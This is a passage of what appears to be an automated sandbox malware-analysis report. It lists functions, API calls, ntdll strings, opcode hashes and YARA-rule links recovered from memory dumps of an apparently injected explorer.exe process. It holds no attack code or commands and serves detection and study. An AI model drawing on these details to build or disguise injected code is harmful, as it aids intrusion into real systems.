                  • Opcode ID: fd5eb24215a1857f3b6c4e3dfbb6db21f0ca3a716729c90902623604546812e7
                  • Instruction ID: 13a70cd696ad1697244c0663ccf587dc2df14aada85ff50d5001c4662e904316
                  • Opcode Fuzzy Hash: fd5eb24215a1857f3b6c4e3dfbb6db21f0ca3a716729c90902623604546812e7
                  • Instruction Fuzzy Hash: 2BF0927238020436E2307669DE02FDF76ADDB80BA0F140614F71DEB2C0DAA1B5418AE5
                  Function 02F18450 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                  Download Yara Rule
                  APIs
                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,74C08500,00000007,00000000,00000004,00000000,02F03EDC,000000F4,?,?,?,?,?), ref: 02F1848C
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: 90029ec0a1fe2d4b8e805dd88c2b5fb9c21bd0afa8bb0a8563cd9a31df341a19
                  • Instruction ID: eead8a0e1f568f1f4b704ea9a89e8eb73458151a7340289404273d43143c9c2a
                  • Opcode Fuzzy Hash: 90029ec0a1fe2d4b8e805dd88c2b5fb9c21bd0afa8bb0a8563cd9a31df341a19
                  • Instruction Fuzzy Hash: 20E09A76200208BBD710EE99DC54FEB37ADEFC8714F008408FA08A7281C670B8118BF4
                  Function 02F18400 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(02F01859,?,02F149BB,02F01859,02F14767,02F149BB,?,02F01859,02F14767,00001000,?,?,02F19CC0), ref: 02F1843F
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: b084f4e6bc9802630b2d107301b732096cdfb55f964f1490ca3245cb6ba33282
                  • Instruction ID: 49a0bf5067eec19d0854e9b20083f55bf6afe5c21affe487fda85b75f09744a0
                  • Opcode Fuzzy Hash: b084f4e6bc9802630b2d107301b732096cdfb55f964f1490ca3245cb6ba33282
                  • Instruction Fuzzy Hash: D8E0657A200218BBD610EE58DC50FAB33ADEFC9714F008418FA08A7242DB70B811CBB4
                  Function 02F07EE0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,?,000016A8,?,000004D8,00000000), ref: 02F07F0C
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 53b62661df330cc76a6816973fe11752289265eb19cc7148155104352092fc4d
                  • Instruction ID: 7868627dc2a397f7e030d80cf2271fb865f14a331b6bf7ed13747edd106171a6
                  • Opcode Fuzzy Hash: 53b62661df330cc76a6816973fe11752289265eb19cc7148155104352092fc4d
                  • Instruction Fuzzy Hash: 10E0807155020827FB2476A8DC85F66735C4748765F584990FF1CDB1C1D774F5119194
                  Function 02F07CF0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                  Download Yara Rule
                  APIs
                  • SetErrorMode.KERNELBASE(00008003,?,?,02F01B40,02F16E87,02F14767,?), ref: 02F07D23
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorMode
                  • String ID:
                  • API String ID: 2340568224-0
                  • Opcode ID: f614c38a97dfa873851f1d801cad7d4b59d04fdde926537a29b977b1b3f48eb4
                  • Instruction ID: 239a4b68451b9eb00182091c7183c769f11ca44927e51ab2a6ad3f198b9c16a9
                  • Opcode Fuzzy Hash: f614c38a97dfa873851f1d801cad7d4b59d04fdde926537a29b977b1b3f48eb4
                  • Instruction Fuzzy Hash: 00D05E716802087BFA10A7E49C02F5A728D9B98794F0480A4BB0DDB2C2ED65F2018669
                  Function 02F00D2B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                  Download Yara Rule
                  APIs
                  • PostThreadMessageW.USER32(?,00000111), ref: 02F00D37
                  Memory Dump Source
                  • Source File: 00000007.00000002.3553452846.0000000002EF0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_2ef0000_explorer.jbxd
                  Yara matches
                  Similarity
                  • API ID: MessagePostThread
                  • String ID:
                  • API String ID: 1836367815-0
                  • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                  • Instruction ID: c90d0ed0f3fad6aede6b356aecde6b2366b8afb4519fd4ff9337b19e93c1e33a
                  • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                  • Instruction Fuzzy Hash: BED0A767B4100C36A60145846CC1DFEB71CDB846A5F004067FB08D5040DA21590206B1
                  Function 05012C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 582c3ce8d36b3b0e375ae8eeb443f1757f4ade929f48cd1563abe4c2718574f0
                  • Instruction ID: f172b0ade58c2418d9d5710c7bc8606cd2f96bd9f7e672eae44780fe50b17fb1
                  • Opcode Fuzzy Hash: 582c3ce8d36b3b0e375ae8eeb443f1757f4ade929f48cd1563abe4c2718574f0
                  • Instruction Fuzzy Hash: 6BB09B769015D6C6EA51E7605609B1F79517BD0701F55C062D3030641F4738C1D1E176

                  Non-executed Functions

                  Function 04DFB799 Relevance: 57.7, Strings: 46, Instructions: 219COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555034508.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4df0000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                  • API String ID: 0-3754132690
                  • Opcode ID: 73576cf6adf64a8724e80efe664b950f496f60ff29d5e41104385c4b6e5844bb
                  • Instruction ID: 02cd0768a2022cb3d52f02c51e77e4fe8a52303118fbd7e7cc33bb5e195b62ea
                  • Opcode Fuzzy Hash: 73576cf6adf64a8724e80efe664b950f496f60ff29d5e41104385c4b6e5844bb
                  • Instruction Fuzzy Hash: F9916FF04483988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                  Function 05012890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: ee945bc10eb0a534f6a902d7d7c1908e102d26ff37435c196a3dcb5f412ae72e
                  • Instruction ID: e72c6f19aeef7d8933df0ad8fb91423de18b97a173017f345df82b037d5451ca
                  • Opcode Fuzzy Hash: ee945bc10eb0a534f6a902d7d7c1908e102d26ff37435c196a3dcb5f412ae72e
                  • Instruction Fuzzy Hash: C95129B5B04257BFDB10DF9DA99097EF7F9BB08200B508129E866D7641D634EE108BE1
                  Function 05082410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 3ac4e48eacba65c646a1f1e0b4338e3d12eb29d0a996c012f9fca1a6faa1ca72
                  • Instruction ID: bfe531d18d98def71a10ff4c0bf65cd41d880b21fe9b221172d1a072eb881ac1
                  • Opcode Fuzzy Hash: 3ac4e48eacba65c646a1f1e0b4338e3d12eb29d0a996c012f9fca1a6faa1ca72
                  • Instruction Fuzzy Hash: CF5114B9A40656AFCB60EE5CD890D7FB7FAAF44200B448429E8D6D3641E670EA448B60
                  Function 05007630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                  Download Yara Rule
                  Strings
                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05044742
                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05044655
                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05044725
                  • Execute=1, xrefs: 05044713
                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050446FC
                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 05044787
                  • ExecuteOptions, xrefs: 050446A0
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                  • API String ID: 0-484625025
                  • Opcode ID: fd89f2a576625ab2718a7541698566f1ade585a8797e50a9696644ad481b8ee4
                  • Instruction ID: d697e3e8634286da4e2663622183a669e422efc6d08e9b65070cb7f688c7b9dc
                  • Opcode Fuzzy Hash: fd89f2a576625ab2718a7541698566f1ade585a8797e50a9696644ad481b8ee4
                  • Instruction Fuzzy Hash: 91510771700209AAEF21DAA4BD99FFE77A9FB14340F4400A9E906A71C0DB75FA42CF51
                  Function 050A6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                  • Instruction ID: 3508a772b59b5ee3d44ea23bea03017d14965f72636a45dd382ac8d6a25fdd8d
                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                  • Instruction Fuzzy Hash: D502F372A08341AFD345CF68D894AAEB7F5FF88700F14892DF9854B264DB72E945CB42
                  Function 0501B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-$0$0
                  • API String ID: 1302938615-699404926
                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                  • Instruction ID: b0fecc9358e3ecbc1acc553e1f9a2aeb977c199a0dd0e250587de6a79009c1c0
                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                  • Instruction Fuzzy Hash: B981E470E052499EDF24CF68E9507FEBBF2BF55710F184119EC91A7290CB348841C76A
                  Function 050820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$[$]:%u
                  • API String ID: 48624451-2819853543
                  • Opcode ID: 3d5916e6c2a61321892a87a54f3083604f6e13766df37f60190d889c0fe31cf5
                  • Instruction ID: 6f9c7122c179418c656b8d7f311994837984cda3f6ff8cd46b66c96fb7fa63b3
                  • Opcode Fuzzy Hash: 3d5916e6c2a61321892a87a54f3083604f6e13766df37f60190d889c0fe31cf5
                  • Instruction Fuzzy Hash: EC21567AA0011AABDB50EF69EC54EFE7BE9EF64644F580116ED45D3200EB30E9118B91
                  Function 04FFF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                  Download Yara Rule
                  Strings
                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050402E7
                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050402BD
                  • RTL: Re-Waiting, xrefs: 0504031E
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                  • API String ID: 0-2474120054
                  • Opcode ID: 67d422c3239b05f6f0a171d19a938d3b76cea2ea1cb27db1ea357ae4c5c8ad88
                  • Instruction ID: 881827ba31041282a861a6cff17087c5a02ad6e4962aa1d4b9e113a5c330c948
                  • Opcode Fuzzy Hash: 67d422c3239b05f6f0a171d19a938d3b76cea2ea1cb27db1ea357ae4c5c8ad88
                  • Instruction Fuzzy Hash: 97E1F371608741DFD720CF28D898B2AB7E0BF88714F140A6EF6959B2E0D774E846CB52
                  Function 0500BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                  Download Yara Rule
                  Strings
                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05047B7F
                  • RTL: Re-Waiting, xrefs: 05047BAC
                  • RTL: Resource at %p, xrefs: 05047B8E
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 0-871070163
                  • Opcode ID: f448d647054100eb61a84e80de90fc9d59981b9245d7bc45091fd2f6b697cb91
                  • Instruction ID: 5eeacd28b8b01fb6194a5048476e265a886964391f1756d83fc6ab00fa63418d
                  • Opcode Fuzzy Hash: f448d647054100eb61a84e80de90fc9d59981b9245d7bc45091fd2f6b697cb91
                  • Instruction Fuzzy Hash: 4341D1753047029FD720DE25E841B6EB7E6FF89720F000A2DF95A97681DB71E8068F91
                  Function 0500B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                  Download Yara Rule
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0504728C
                  Strings
                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05047294
                  • RTL: Re-Waiting, xrefs: 050472C1
                  • RTL: Resource at %p, xrefs: 050472A3
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-605551621
                  • Opcode ID: 50b5ac32e9f181e877c3d7d8fd7c1f650ef2b01d6fc3a9f8c12da8d8b8949506
                  • Instruction ID: 4dcb94d992fc8107be8f276265f840280c0627bd36e69df255b0d40bb4895a9c
                  • Opcode Fuzzy Hash: 50b5ac32e9f181e877c3d7d8fd7c1f650ef2b01d6fc3a9f8c12da8d8b8949506
                  • Instruction Fuzzy Hash: 5041FFB1704202ABD721DE25ED41FAEB7E6FB94720F100629FC55AB280DB21F842CBD1
                  Function 05082300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$]:%u
                  • API String ID: 48624451-3050659472
                  • Opcode ID: 12e73704d592527e5685d2f7089e064520cd3d2301e7993106b84cdade47e003
                  • Instruction ID: a2e5c4c8b7424dd30550361720e50a425edc264070102fd2d1ec00397fc23f56
                  • Opcode Fuzzy Hash: 12e73704d592527e5685d2f7089e064520cd3d2301e7993106b84cdade47e003
                  • Instruction Fuzzy Hash: 66318776A002299FCB60DE28DD54FFEB7F8FF54650F854559E889E3240EB30AA458B60
                  Function 05017D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-
                  • API String ID: 1302938615-2137968064
                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                  • Instruction ID: 1138955c0db37542352ee46babec88a64cefa57370c47fa2944fa2c792f2fb28
                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                  • Instruction Fuzzy Hash: 7591C271E0420A9BDF64CE69E881ABFB7F6FF44360F14851AEC56E72C0D7309941875A
                  Function 04FD9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID: $$@
                  • API String ID: 0-1194432280
                  • Opcode ID: 0e6e0e30b3c114304f2ff51366a6b99405cee5c3dad47b8348d4d837de066208
                  • Instruction ID: 0c04c3f69b0ec78f2c91bc310075ccc09c8ec31ea36fa6a376005840e36f3a60
                  • Opcode Fuzzy Hash: 0e6e0e30b3c114304f2ff51366a6b99405cee5c3dad47b8348d4d837de066208
                  • Instruction Fuzzy Hash: 2C812CB5D002699BDB31CF94CC45BEEB7B9AF08714F0441EAA909B7240D770AE85CFA0
                  Function 04FD04E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153COMMON
                  Download Yara Rule
                  APIs
                  • RtlGetReturnAddressHijackTarget.NTDLL ref: 04FD0564
                  Strings
                  • kLsE, xrefs: 04FD0540
                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 04FD063D
                  Memory Dump Source
                  • Source File: 00000007.00000002.3555138631.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FA0000, based on PE: true
                  • Associated: 00000007.00000002.3555138631.00000000050C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.00000000050CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000007.00000002.3555138631.000000000513E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_4fa0000_explorer.jbxd
                  Similarity
                  • API ID: AddressHijackReturnTarget
                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                  • API String ID: 806345674-2547482624
                  • Opcode ID: fb6a5c04e7a0b25373907789d1b8634a383fe592cf24769c1532efe90eb13dd4
                  • Instruction ID: acc2c4a3f39408b4851de56a314bf734be9657886775dc57772bbb0fa79915c2
                  • Opcode Fuzzy Hash: fb6a5c04e7a0b25373907789d1b8634a383fe592cf24769c1532efe90eb13dd4
                  • Instruction Fuzzy Hash: BF51C171A047469FC724EF24C9447A7BBE6AF85308F08493EE99987240EB74E546CF92